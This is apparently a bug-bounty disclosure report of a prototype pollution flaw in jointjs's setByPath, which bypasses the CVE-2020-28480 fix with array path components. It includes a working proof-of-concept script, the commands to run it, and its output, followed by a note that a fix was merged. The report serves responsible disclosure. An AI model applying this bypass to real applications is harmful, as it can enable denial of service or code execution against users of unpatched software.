Prototype Pollution in clientio/joint

Valid

Reported on

Sep 5th 2021


✍️ Description

The jointjs package is vulnerable to Prototype Pollution. A type confusion vulnerability in the path handling of `setByPath` allows the fix for CVE-2020-28480 to be bypassed when the path components supplied in the `path` parameter are arrays rather than strings. In particular, the check `key === "__proto__"` returns false when `key` is `["__proto__"]`, because the strict equality operator `===` always returns false when its operands have different types, even though the array is later coerced to the string `"__proto__"` when used as a property name.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
const jointjs = require("jointjs");
const obj = {};
console.log("Before : " + {}.polluted);
// The first path component is an array, so it fails the key === "__proto__"
// check but is still coerced to the string "__proto__" when used as a key.
jointjs.util.setByPath(obj, [["__proto__"],'polluted'], 'Yes! Its Polluted',',');
console.log("After : " + {}.polluted);

Execute the following commands in the terminal:

npm i jointjs # Install affected module
node poc.js # Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

Occurrences

We have contacted a member of the clientio/joint team and are waiting to hear back 3 months ago
clientio/joint maintainer confirmed that a fix has been merged on e5bf89 3 months ago
The fix bounty has been dropped